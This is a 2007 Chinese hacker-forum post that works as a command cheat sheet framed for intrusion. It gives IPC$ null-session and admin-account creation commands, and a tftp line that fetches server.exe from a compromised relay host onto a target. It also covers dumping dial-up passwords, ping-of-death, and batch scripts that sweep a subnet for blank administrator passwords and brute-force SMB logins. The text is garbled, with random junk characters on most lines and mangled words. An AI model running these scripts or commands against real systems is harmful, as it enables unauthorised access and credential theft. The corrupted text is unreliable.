- 最后登录
- 2012-2-9
- 在线时间
- 188 小时
- 注册时间
- 2006-9-18
- 阅读权限
- 130
- 帖子
- 2737
- 精华
- 9
- UID
- 1382346
- 铜钱
- 2793
- 元宝
- 169
- 威望
- 7490
- 积分
- 3875
|
发表于 2007-10-6 05:43:21
|显示全部楼层
S TCP 211.58.0.0 211.58.254.255 4899 1000 s扫描 用到它# ~- M& x0 P+ T6 Q+ q- a$ f
dialupass.exe /allusers /stext "c:\pass.txt" ADSL账号
, q i0 ]5 C2 W7 F0 E! L$ t1 Pnet share abc=c:\ 共享2 I9 E1 z% ]# l4 A
, Q4 n0 ~" K% L
) g1 d- j" B: \
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
( r4 L6 k7 S7 ^; s/ [5 a2 E" V Unet use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 % ?% J5 w0 J# T
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: : ~( ?3 C- g; ]' U! [
net use h: \\ip\c$ 登陆后映射对方C:到本地为H:
. t# m& G5 C* u* `& O# T9 e$ Enet use \\ip\ipc$ /del 删除IPC链接
! u5 d+ }8 A+ c l8 i( F K! x. ?net use h: /del 删除映射对方到本地的为H:的映射
8 r0 f) I- z- Qnet user 用户名 密码 /add 建立用户
+ }. l9 _3 r# d" n% M' gnet user guest /active:yes 激活guest用户
0 Q2 V! c& p9 _ B$ g9 w* A4 _net user 查看有哪些用户 # K t( G; A4 {: ^1 k4 n7 j# F% d
net user 帐户名 查看帐户的属性
& O4 b$ p0 ^0 l Anet localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数
' Z4 \: J- R; D% r! Y0 D/ h; Tnet start 查看开启了哪些服务
6 f4 M$ W5 D1 D; A" t: rnet start 服务名 开启服务;(如:net start telnet, net start schedule)
- C( V* e1 b& |" } Y) inet stop 服务名 停止某服务
: p3 T- y( `0 h) ]net time \\目标ip 查看对方时间
+ S* ^9 v8 n; _' l9 `net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
S$ W' b5 X' I0 s9 `5 y5 ^net view 查看本地局域网内开启了哪些共享 ; u0 r* m3 C I4 u$ Z
net view \\ip 查看对方局域网内开启了哪些共享
4 O+ g$ r! F% m) k3 z* f; U; qnet config 显示系统网络设置
& R2 B0 `5 P) @+ Bnet logoff 断开连接的共享 , ~8 \3 D$ Z* ]+ v* ~' R$ v. W9 N/ K
net pause 服务名 暂停某服务 3 c N0 b/ O0 t$ i
net send ip "文本信息" 向对方发信息
' K7 L2 Y* L" Q' Rnet ver 局域网内正在使用的网络连接类型和信息
& ]3 N' S* M, g& C7 C, Jnet share 查看本地开启的共享 " n' n0 P0 c3 Z0 Y2 ]
net share ipc$ 开启ipc$共享 / k, w, u$ W+ _4 y3 G: J
net share ipc$ /del 删除ipc$共享 , u% Z: l I# C, m, _
net share c$ /del 删除C:共享 ! p2 k5 o- ~2 ?8 X3 a6 q+ o
net user guest 12345 用guest用户登陆后用将密码改为12345 # W0 V" m. S9 T3 R3 w8 _. Z8 x" a
net password 密码 更改系统登陆密码
! K9 T6 s2 X- Xnetstat -a 查看开启了哪些端口,常用netstat -an
& T2 a% o: x( `4 S, B; [netstat -n 查看端口的网络连接情况,常用netstat -an - O* K4 ?* {4 n) U) ?
netstat -v 查看正在进行的工作
$ `" i5 l2 Y0 c: B& Onetstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) " F3 } O& r% l# a6 `0 S' E
netstat -s 查看正在使用的所有协议使用情况 # ~$ n) _8 r4 k: s6 G
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 % n6 A/ ^1 ^. h6 A! r- @$ }
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
! E8 e# x4 M& Y- Dping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
8 a0 _. b( {) a, }ping -t -l 65550 ip 死*之ping(发送大于64K的文件并一直ping就成了死*之ping) 8 c! `0 s0 G. A+ B& ?0 q8 E8 w
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 $ `- A9 @7 v. x5 ~) E6 w! \3 G* U
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
. n9 ]$ V2 X1 W; b4 }1 T- Vkill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
) T8 G) a' m! [: T R) bdel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
+ s0 z7 J D% m; `) K& i" Y. f
# T4 O8 ?5 v1 m" V#2 二:
; {1 g5 i0 \: V2 |
2 _. f+ x8 [- z- P3 tdel /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) $ c$ R9 c5 S6 @6 _/ H; c! w
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 4 _" r* T# u: U* V+ L6 G9 @1 W
fc one.*t two.*t > 3st.*t 对比二个文件并把不同之处输出到3st.*t文件中,"> "和"> >" 是重定向命令 " y* E7 i% e9 r9 V( `$ h6 u" Y7 }
at id号 开启已注册的某个计划任务 ( R5 Y! k+ ] o+ n! h
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
3 X& ?* A1 A& v. L' s4 zat id号 /delete 停止某个已注册的计划任务 + x9 X! d, H( Y: o! Z
at 查看所有的计划任务 8 F6 ~# y+ ` a; o
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
. ?7 Y# b% d* kfinger username @host 查看最近有哪些用户登陆 7 J# o- c! T2 X3 f2 `5 t1 Y, b
telnet ip 端口 远和登陆服务器,默认端口为23
+ M# q9 f m* Q" p6 J) x) bopen ip 连接到IP(属telnet登陆后的命令)
" I0 L5 |0 C6 f# Z. E& Q/ b2 d2 T, ktelnet 在本机上直接键入telnet 将进入本机的telnet 0 |# Y k! D" Y( H" q* d) ?6 Y
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 - m" w6 T) V9 F
copy c:\srv.exe \\ip\***$ 复制本地c:\srv.exe到对方的***下 2 y" n7 a2 C# A, V2 C5 b3 b, q
cppy 1st.jpg/b+2st.*t/a 3st.jpg 将2st.*t的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.*t文件头要空三排,参数:/b指黑客动画吧文件,/a指ASCLL格式文件
/ N2 z3 U4 X) q2 J; `/ Rcopy \\ip\***$\svv.exe c:\ 或:copy\\ip\***$\*.* 复制对方***i$共享下的srv.exe文件(所有文件)至本地C:
: N0 @) w+ n8 v( Mxcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 ) b) \2 W5 o4 o% J3 b
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以黑客动画吧模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
7 A2 \8 D5 P! `' q3 _, a3 ktftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机 9 Y4 F# u( t0 W" n' E
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用黑客动画吧方式传送(可执行文件进);默认为ASCII格式传送(文本文件时) 6 k* U" m4 L7 J1 t
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface ) s9 Q2 R, c5 a* l+ E8 A, A
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 : F2 r1 Q9 e" \/ d6 @2 \+ N
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 $ ~6 Y$ Y' ]4 X% w# d& p
mem 查看cpu使用情况 . l N8 D! n. Y5 n4 U: G
attrib 文件名(目录名) 查看某文件(目录)的属性
* T" a) o( V- v8 K4 ~attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性 1 _+ k V2 U7 a& _! k& p( r2 A _
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 2 |/ `9 g+ M0 t& o, @
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间 @3 x$ F) X" h
set 指定环境变量名称=要指派给变量的字符 设置环境变量 5 R: n( E) }& b+ ] Z: y+ V. D
set 显示当前所有的环境变量 }( B# u8 X0 U7 X) K* @' Z
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 0 Z! w8 u" T j
pause 暂停批处理程序,并显示出:请按任意键继续.... ( n' ~4 Z! P/ J6 n+ ]. V7 N
if 在批处理程序中执行条件处理(更多说明见if命令及变量) * x+ n# O1 [- ~8 |4 C
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签) # p/ a1 q* b& v/ h* L: L( t; E5 L0 R5 E
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
8 p+ d/ v. _6 y8 r, Z. o q& W" cfor 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
* S* V/ {2 C) |$ P' s# O1 [( ]echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
( J; i6 }& |: \% d/ }0 qecho 信息 在屏幕上显示出信息
; Y# O% J9 y3 `# V7 V3 \: }echo 信息 >> pass.*t 将"信息"保存到pass.*t文件中 - ?/ k2 a* N8 l
findstr "Hello" aa.*t 在aa.*t文件中寻找字符串hello / _+ H8 e6 {3 n* Z' _9 O
find 文件名 查找某文件 ) ~3 i) }) _6 q4 h
title 标题名字 更改CMD窗口标题名字
& p2 m8 g: N/ s7 W' j4 icolor 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
. |2 v' M$ K3 G9 Oprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
+ ]& P) G, {1 Q) E
" y0 p$ H! M; S# L1 c* U#3 三:
7 S% M6 }( ~7 {/ Z
8 r' N7 n- G! g) gver 在DOS窗口下显示版本信息
7 K7 K& I; h4 |7 o( ~% X: nwinver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
' W$ {4 k( E# e( i/ p: Lformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:format D: /FS:NTFS " }6 U8 B* z; ?+ a# A( G
md 目录名 创建目录
1 L+ s- V1 E4 y! qreplace 源文件 要替换文件的目录 替换文件 / u! K. P9 g6 i
ren 原文件名 新文件名 重命名文件名
/ p! E8 _: c# J& btree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 % m/ ?; N* c( [# M
type 文件名 显示文本文件的内容 ) {4 w4 D5 C# O0 P: N
more 文件名 逐屏显示输出文件 : A0 P' ^1 E( I" A" A) u: J
doskey 要锁定的命令=字符
$ Z& h$ f$ H. ? pdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
' ]3 Z- A9 O6 A2 t( C' H+ @taskmgr 调出任务管理器 ( x. [# J; Y; ?/ Q0 R, O
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
7 c$ l9 `' S; l; V0 g& ^% qtlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
9 J, \/ W7 _7 {exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe ^5 M( A6 V z% f) Y' Z
path 路径\可执行文件的文件名 为可执行文件设置一个路径。 7 f0 R# e# l# J/ P# S
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
5 i. L7 \: L$ `: H8 Bregedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; + q0 Q. H4 E! _: n
regedit /e 注册表文件名 导出注册表
! I: i( f* K/ D, }7 z& ?' Dcacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.*t /D pub 设定d:\test.*t拒绝pub用户访问。 $ w* ?8 b/ S, B2 f
cacls 文件名 查看文件的访问用户权限列表
5 c5 Q+ \8 C, i+ [. fREM 文本内容 在批处理文件中添加注解 # X Y9 `6 b' k$ p r. ]6 \* Z
netsh 查看或更改本地网络配置情况& Y p# n! `( C8 o: q
' Z& E2 m0 u1 k; h( y. x4 W6 P
#4 四:
, Z$ c* B/ ]/ c; O% O; \- }; }' |$ z
IIS服务命令:
/ g+ C' g. B7 l h6 Iiisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现) : y- r# ~8 e' T8 U& S
iisreset /start或stop 启动(停止)所有Internet服务 ) k! N, N }% ^. k! e0 e
iisreset /restart 停止然后重新启动所有Internet服务
* e4 w5 o- d9 t% R! Diisreset /status 显示所有Internet服务状态 * L& w0 B5 f( Z+ y; F! J4 ]
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
S/ a8 e' f" i8 Aiisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 5 ?* e( v3 k3 o2 u7 |4 Y1 ~* B
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
* h3 ? i4 o* f& j6 miisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 - T! u. S9 J v( ~$ X
FTP 命令: (后面有详细说明内容) 6 G; c! R' B& g8 t
ftp的命令行格式为:
) A( `! m) ?; a! L2 b$ Yftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。8 M$ X7 ? V2 R" _' V
-d 使用调试方式。 / p/ ]2 E, F* Z- o5 u% ]. W
-n 限制ftp的自动登录,即不使用.netrc文件。7 \& E- F; B, n: b
-g 取消全局文件名。
4 P: j7 X9 ~9 Z% U, Ehelp [命令] 或 ?[命令] 查看命令说明
: g- b) w, |- u9 ebye 或 quit 终止主机FTP进程,并退出FTP管理方式. 9 U# @% F( @2 B
pwd 列出当前远端主机目录
! {2 R& [4 j }put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
2 i9 f1 v m4 k* e% A1 Oget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
1 @! e5 w, w3 h/ X/ mmget [remote-files] 从远端主机接收一批文件至本地主机 ' i6 l6 f/ c8 w6 ]- }0 M6 N) o+ n
mput local-files 将本地主机中一批文件传送至远端主机 # [$ j A! N/ d; \; z
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 . u( ~* ^/ J: T' L$ j! t6 E
ascii 设定以ASCII方式传送文件(缺省值)
8 W# Y1 p0 a7 {9 O ?' T# nbin 或 image 设定以黑客动画吧方式传送文件 % e5 X4 t6 i1 A# O/ f- S& _: a
bell 每完成一次文件传送,报警提示 ( C; v% h/ o, J- o' `' C! j' c9 D
cdup 返回上一级目录 5 C7 G$ J8 h: c$ _% ^
close 中断与远程服务器的ftp会话(与open对应)
, w! h( \2 O! b/ Q Lopen host[port] 建立指定ftp服务器连接,可指定连接端口 - S$ U; M) E& o+ J6 F+ W" Z( H. l/ V
delete 删除远端主机中的文件 : P3 B0 o" C# E+ Q {
mdelete [remote-files] 删除一批文件 . x* K4 Q W* E% g% T& G( w1 J
mkdir directory-name 在远端主机中建立目录 " }5 ?& [1 D& e! C3 Y( ~
rename [from] [to] 改变远端主机中的文件名 ) `% _ K0 A; i# F+ ^
rmdir directory-name 删除远端主机中的目录 ! a: \/ Y8 Z& d* t$ e2 r
status 显示当前FTP的状态 ! a) o& U. I5 q
system 显示远端主机系统类型
/ Y0 x9 {/ L7 k9 t: M& `! s8 s1 x9 @user user-name [password] [account] 重新以别的用户名登录远端主机
( q, L+ E* `8 ]+ v) {open host [port] 重新建立一个新的连接
$ o: w: t1 A- Y0 Y8 I. z1 ]prompt 交互提示模式 , M) a+ K6 M$ A. O0 S0 ^5 ?% L0 n! s
macdef 定义宏命令
* Q. S$ M; H- D: Z" n; D1 i9 S. Blcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
( S, R9 D- v$ Q, L! @$ Lchmod 改变远端主机的文件权限 ( x1 i. k. N9 F% Z& c* `" Z
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 ( y: r( `$ h+ M4 Z k3 z- r9 D
cd remote-dir 进入远程主机目录 ; E3 u/ T" G4 N5 H
cdup 进入远程主机目录的父目录
# o0 x; C8 T. V' |! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip% \& ]/ r" D' O. H( i3 i9 N
0 t# Q( B) L0 [# i5 L- _
#5 五:) g& X8 B! F$ F1 _- @8 B- p& y5 g
4 U5 [: D) q4 ~+ _4 ~; {$ b" {MYSQL 命令:
; n; a# H# ?2 \3 x7 ^4 @mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。8 p) J6 r# e4 y! I2 o( e- x: i
(例:mysql -h110.110.110.110 -Uroot -P123456 1 E" K! [! S) P6 V( r/ U H
注:u与root可以不用加空格,其它也一样) }3 ^) J; v: p' k1 j. c! c: _' U" A
exit 退出MYSQL
4 I8 Z5 a0 Q- s' K p! s8 imysql*** -u用户名 -p旧密码 password 新密码 修改密码 * g# [/ h. k: W4 O: j
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符) 3 r3 X/ B. {0 z4 p: x3 _
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
8 P: m$ C; k+ f: n( ~use mysql;
2 _7 K- S( U& x4 U, t3 P7 }) pshow tables; 显示库中的数据表 0 M6 h2 @4 d3 w0 }$ V
describe 表名; 显示数据表的结构
. z2 b e( r0 {# z$ |$ I4 H) ?; icreate database 库名; 建库 ) K- I# k0 i, S6 ~/ Z5 n: }, W! y3 f% G! F
use 库名;
. n) X: Y; _) _" {! o7 jcreate table 表名 (字段设定列表); 建表
8 b4 a b4 U/ t7 Edrop database 库名;
5 ?' h5 v) _+ V1 s9 |drop table 表名; 删库和删表 0 a9 E3 P. y" S: Z {# j6 G
delete from 表名; 将表中记录清空 - J: r+ ~* E- }: H7 G
select * from 表名; 显示表中的记录
* E8 [* [2 C3 h+ S1 T/ _mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
- m, z7 ?) i2 ?% u, A# `0 g" rwin2003系统下新增命令(实用部份):
6 T& s. o; X8 }' H& ?shutdown /参数 关闭或重启本地或远程主机。: @( N0 C' W; `: t7 o' x" k
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
: d1 ]* t" l# J9 g8 v6 \5 p' j例:shutdown /r /t 0 立即重启本地主机(无延时) . g2 f& M1 N% h$ k" T
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。1 x* x$ P' u2 _7 [+ I
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。 ' S" u) [% g# r: I; Y
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。* [" ] i" S# a, N) f8 K
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。5 B) @; x1 h1 x& J; ^8 p# e* _; W
9 E! q6 |+ a; E5 a4 g7 s
#6 六:3 q- }% D0 B4 d7 G& T8 N" d
' U! ^1 Z' ?- R0 E0 }& cLinux系统下基本命令: 要区分大小写
: v: t4 @ X1 k, {' X- Juname 显示版本信息(同win2K的 ver)
$ V9 I& ~; n3 a+ P! c1 E( @* jdir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
3 a% Y$ @' j& [" `8 l7 i4 F' \! }pwd 查询当前所在的目录位置 4 V7 X7 f3 Q8 X# z$ Y* b
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。 3 D7 J/ B& j+ c0 g5 v( \
cat 文件名 查看文件内容 7 P5 G2 @0 y5 x5 P. a/ O
cat >abc.*t 往abc.*t文件中写上内容。 0 @% c& J! T2 q
more 文件名 以一页一页的方式显示一个文本文件。
! ]2 P4 k8 b/ z6 acp 复制文件
) b# V' o8 l) d$ r9 Rmv 移动文件
Z+ R9 K2 m, x: u# Qrm 文件名 删除文件,rm -a 目录名删除目录及子目录
- {: V: B$ |6 i: |/ Y$ C" @+ v. Bmkdir 目录名 建立目录 + i7 K. a5 c3 Y, ~* m
rmdir 删除子目录,目录内没有文档。
* X( w: O1 W. \, T& Rchmod 设定档案或目录的存取权限
T7 s# P+ z* V d% a: Z# Kgrep 在档案中查找字符串
5 o- z) N* j' I; z$ y9 l6 mdiff 档案文件比较 . G( m# h; w4 }& l
find 档案搜寻 7 m& ^3 Z' C- v) p. S
date 现在的日期、时间
2 _' ]4 Q, V; m0 Z! hwho 查询目前和你使用同一台机器的人以及Login时间地点
4 X( E( C- J @9 [- ]& M6 Pw 查询目前上机者的详细资料 8 A- J6 p$ R% f# Y
whoami 查看自己的帐号名称 3 M+ p- ~: R% Z x
groups 查看某人的Group o) g& s0 Q, V8 J& H. H
passwd 更改密码
0 b. Q+ ^- _/ C. X6 [history 查看自己下过的命令
/ \9 V' b9 S z f$ [ps 显示进程状态 R. I2 r( V0 Q# t: p: p' Z
kill 停止某进程
' s6 c3 ?/ @9 Ygcc 黑客通常用它来编译C语言写的文件
8 R- R1 U( X. n! A4 R5 ]+ n" asu 权限转换为指定使用者 0 G2 f, o9 d$ m6 U* f
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。 ! }( y8 v7 E# f% u) k: ]% ^' T
ftp ftp连接上某服务器(同win2K)
7 U( n) u* h$ _
) E6 K" l8 F% q- q2 k5 \$ q5 L. ^6 H附:批处理命令与变量* l$ {6 j- w. {
3 n) |& v; E* {/ x1:for命令及变量 基本格式: ! D/ N5 S5 W, `; E
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
2 G" [2 r! I8 \) w6 K" {批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3
4 \) Q$ _8 C7 L h# w5 q/ e o; w( |1 o9 x
(set):指定一个或一组文件,可使用通配符,如:(D:\user.*t)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }9 y" s3 `$ K$ O# {6 H* w
* _* Z, n# n' P3 R6 s+ w- k6 \6 L
command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开
1 h/ j7 m5 J* A; d3 ]. s" @command_parameters:为特定命令指定参数或命令行开关
( Z1 T& x2 x; d# ]5 J8 L/ D/ J' d# B% M/ K$ z& h' Y. i
IN (set):指在(set)中取值;DO command :指执行command& B9 j3 I" P$ k& _) M
2 X6 O- u, r0 _/ Y- h/ @8 E
参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:\pass.*t)时 }。 6 D4 C) W" ^7 J% Z* S) h
用法举例:
9 z' L5 P" S( [, x5 D& q5 i0 ?) V@echo off
: l$ D; S# H$ }echo 用法格式:test.bat *.*.* > test.*t 2 n1 J' L' W) n* P9 G* D/ c! I
9 [% A/ J, q8 \6 k* mfor /L %%G in (1 1 254) do echo %1.%%G >>test.*t & net use \\%1.%%G /user:***istrator | find "命令成功完成" >>test.*t
+ d$ { S% z% u1 V( a存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立***istrator密码为空的IPC$连接,如果成功就把该IP存在test.*t中。, C9 l; Y5 @: \3 I; ^
( R2 ~& T) M7 `& z6 P: y
/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
/ n; Q' Z: ]$ K1 K@echo off 8 L- G+ z* b3 w) [- r! m/ E
echo 用法格式:ok.bat ip
! W. V% }' x' s; nFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
; L& z7 E7 `9 a2 d# a# D1 b! N存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。http://www.jz5u.com/- o* V' y1 L6 ]$ H' m& c- z1 ^
/ u/ s0 O8 I9 @+ }& n
#7 七:
f# |7 ^5 L4 [6 ? B3 K7 F& [/ r/ \% ~& }. _
4 B* Q9 t5 D: U- o0 `: L2:if命令及变量 基本格式:
9 f5 E+ S- O; t( p- u% `IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。
1 l2 V4 x5 |" T+ ^* }例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。
( e% V' L! K0 [) Q! a0 指发现并成功执行(真);1 指没有发现、没执行(假)。 7 y# B% k: F$ k$ L2 C4 `
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。* \# C8 d9 [5 I1 n1 r
例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")
7 v* C D# `. F9 | ], N+ LIF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。# b/ K* D4 P$ r# h m
例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。 3 p3 `; ]( y6 z) o- i2 s7 ^
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.*t. <del test.*t.> else echo test.*t.missing ”,注意命令中的“.”
! i+ Y9 U* o8 ~% I* C' W( K _4 ^7 w2 C" {9 B9 T
(二)系统外部命令(均需下载相关工具):
. v1 l+ }( }1 c0 T) e. y9 L- L3 i% Q% x( S2 c( Q6 _) x6 L5 n
1、瑞士军刀:nc.exe
) \+ Q1 N1 h; T. i: f; S; D$ _) M5 K4 Q
参数说明: % T" s" H/ ^* q/ Q* m* b4 [
-h 查看帮助信息
6 C. a Y- ?# N, t c-d 后台模式
# k: m* X, K6 T; d-e prog程序重定向,一但连接就执行[危险] $ E3 I' T/ N) `7 |0 I
-i secs延时的间隔
; i+ c8 f S# X7 I( `-l 监听模式,用于入站连接
& {9 H$ N8 ]# O+ S-L 监听模式,连接天闭后仍然继续监听,直到CTR+C , N8 K. ^0 X, I4 T" m3 s8 r
-n IP地址,不能用域名 % u( a# H4 w5 ^$ ]+ L& a5 L
-o film记录16进制的传输 & @ v2 A4 ]: H
-p[空格]端口 本地端口号 3 C6 ^$ x' V. s4 `# g1 t, A/ P
-r 随机本地及远程端口 + `( F9 Q9 N: @- A+ H
-t 使用Telnet交互方式
' S2 P0 E+ R+ z! e4 V. U-u UDP模式 - E( Y1 n+ i! m5 M: t' O. u i7 @
-v 详细输出,用-vv将更详细
9 l* P9 w; O2 Y! x) x1 W-w数字 timeout延时间隔 / z- T' B# F( ^/ {, w2 c
